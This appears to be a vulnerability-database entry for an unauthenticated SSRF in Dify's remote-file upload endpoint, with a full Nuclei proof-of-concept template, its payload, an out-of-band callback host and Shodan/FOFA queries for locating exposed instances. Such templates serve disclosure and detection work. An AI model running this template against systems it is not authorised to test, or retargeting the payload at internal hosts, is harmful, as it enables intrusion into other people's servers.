dify-ssrf-remote-upload: Dify < 1.13.0 - Unauthenticated SSRF via Remote File Upload

2026-06-24 Dify PoC Public

Description

Detected Dify prior to 1.13.0 is vulnerable to unauthenticated Server-Side Request Forgery via the /console/api/remote-files/upload endpoint. The endpoint accepted a user-controlled URL parameter and issued HTTP requests from the server without authentication or SSRF protections such as private IP blocking.

PoC

id: dify-ssrf-remote-upload

info:
  name: Dify < 1.13.0 - Unauthenticated SSRF via Remote File Upload
  author: 0x_Akoko
  severity: high
  description: |
    Detected Dify prior to 1.13.0 is vulnerable to unauthenticated Server-Side Request Forgery via the /console/api/remote-files/upload endpoint. The endpoint accepted a user-controlled URL parameter and issued HTTP requests from the server without authentication or SSRF protections such as private IP blocking.
  reference:
    - https://github.com/langgenius/dify/security/advisories/GHSA-8235-vv5j-mmvg
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: langgenius
    product: dify
    shodan-query: title:"Dify"
    fofa-query: title="Dify" || body="dify"
  tags: dify,ssrf,unauth,ai

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Dify</title>", "dify")'
        condition: and
        internal: true

  - raw:
      - |
        POST /console/api/remote-files/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url":"http://{{interactsh-url}}/ssrf-test"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
        condition: and
# digest: 490a00463044021f4d57777a0fb8e20dfe12264bab4182a435148eb6bfed75f8e3d547718ea8cc022100fe9247cfd31fbd50430d4cb03edce00a4a9c73cc1c7c28dc014f5f01004849ea:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities